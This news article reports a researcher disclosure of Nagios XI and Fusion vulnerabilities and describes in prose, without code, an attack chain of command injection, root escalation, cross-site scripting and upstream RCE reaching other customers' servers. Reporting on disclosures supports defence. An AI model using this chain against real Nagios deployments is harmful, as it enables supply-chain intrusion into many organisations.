Cybersecurity researchers from Skylight Cyber disclosed technical details about 13 vulnerabilities in the Nagios network monitoring application that could be exploited by threat actors to hijack the infrastructure.
Nagios is an open-source IT infrastructure monitoring and alerting tool for mission-critical infrastructure components including applications, services, operating systems, network protocols, systems metrics, and network infrastructure.
The flaws discovered by the experts include Remote Code Execution issues and privilege escalation issues. Below the full vulnerabilities list:
The researchers reported the flaws to Nagios in October 2020 and the company addressed them in November.
The most severe vulnerability, tracked as CVE-2020-28648, is an improper input validation issue that resides in the Auto-Discovery component of Nagios XI that could be exploited by an authenticated attacker to execute remote code. The flaw received a CVSS score of 8.8, it affects versions prior 5.7.5.
“The bug that allows for this vulnerability is the use of an unsanitised command line in the call to the exec() function. The exec function is a PHP built-in function that will run operating system shell commands. It takes at least one argument which is the command line string that will be executed. If we can control the command line argument passed to the exec function, we can execute arbitrary shell commands.” reads the post published by the researchers.
Experts aimed at demonstrating that once compromised the install at one of the customer sites, threat actors then can attack upstream to the telco’s network and then attack all the remaining customers using Nagios.
To do that, the researchers devised an attach chain composing of the following set of vulnerabilities and exploits:
Threat actors could exploit the CVE-2020-28648 and CVE-2020-28910 vulnerabilities to achieve RCE and elevate privileges to “root” on the customer’s install. Once the attackers have compromised the Nagios Fusion install, they can send specially crafted data to the upstream Nagios Fusion server.
“The Nagios Fusion application periodically polls the fused Nagios XI servers to get information to display on various Fusion dashboards. The security model for doing this is inherently flawed since the Nagios Fusion will trust any data returned by the fused XI server.” continues the experts. “Since the data is trusted, the Nagios Fusion will display the information on various dashboards without sanitising the data. Therefore, by tainting data returned from the XI server under our control we can trigger Cross-Site Scripting and execute JavaScript code in the context of a Fusion user.”
Then the attackers gain RCE on the Fusion server by exploiting the CVE-2020-28905 issue and elevate permissions triggering the CVE-2020-28902 flaw to take over the Fusion server. Upon compromising the Fusion server the attackers can compromise the XI servers located at other customer sites.
Summarizing, vulnerabilities like the one discovered by the researchers could be exploited by threat actors in supply chain attacks that could have dramatic impact on the customers of the targeted organizations.
Experts pointed out that threat actors with sophisticated capabilities have the skills to easily discover vulnerabilities such as the ones they found in Nagios architecture.
“While the SolarWinds attack was very different, as the vendor itself was targeted, it emphasised again the shift towards attacking 3rd party technology hubs, rather than a single target.” concludes the experts. “If we could do it as a quick side project, imagine how simple this is for people who dedicate their whole time to develop these types of exploits. Compound that with the number of libraries, tools and vendors that are present and can be leveraged in a modern network, and we have a major issue on our hands.”
Follow me on Twitter: @securityaffairs and Facebook
[adrotate banner=”9″] | [adrotate banner=”12″] |
(SecurityAffairs – hacking, Nagios network monitoring)
[adrotate banner=”5″]
[adrotate banner=”13″]